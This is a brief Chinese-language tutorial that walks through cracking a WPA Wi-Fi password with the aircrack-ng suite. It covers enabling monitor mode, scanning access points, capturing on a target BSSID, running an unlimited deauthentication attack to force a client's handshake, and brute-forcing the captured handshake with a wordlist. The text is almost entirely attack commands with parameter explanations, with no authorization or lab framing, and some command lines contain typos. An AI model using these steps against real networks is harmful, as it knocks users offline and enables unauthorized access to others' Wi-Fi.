1.查看插入的网卡
iwconfig
2.查看无线网卡
airmon-ng
3.开启网卡监听模式,记录monitor名称,杀掉其他使用WiFi进程
airmon-ng start wlan0
4.扫描信号
airodump-ng wlan0mon
- BSSID是AP端的MAC地址
- PWR是信号强度,数字越小越好
- Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
- CH是对应路由器的所在频道
- ESSID是对应路由器的名称
5.停止扫描抓取合适目标
CTRL + C
6.监听目标频道查看链接该ap的客户端准备抓包
airodump-ng -c6-w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon
注: airodump-ng -c <AP的频道(如紫色所示)> -w <抓取握手包的存放位置(如黄色所示)> --bssid <AP的MAC地址(如紫色所示)> <你的的monitor名称>
7.保持上一个terminal窗口的运行状态,打开一个新的terminal,进行解除认证攻击
aireplay-ng -00-a C0:00:00:00:00:48 -c18:00:00:00:00:88 wlan0mon
注:aireplay-ng -<攻击模式,我们这里使用 解除认证攻击(黄色区域)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <你的的monitor名称>
注:当你获取道握手包时,红色区域会显示”WPA handshake”。
8. 关闭监听模式。
airmon-ng stop wlan0mon
9.使用字典进行暴力破解。
aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap
注:`aircrack-ng -w <字典路径> <握手包路径>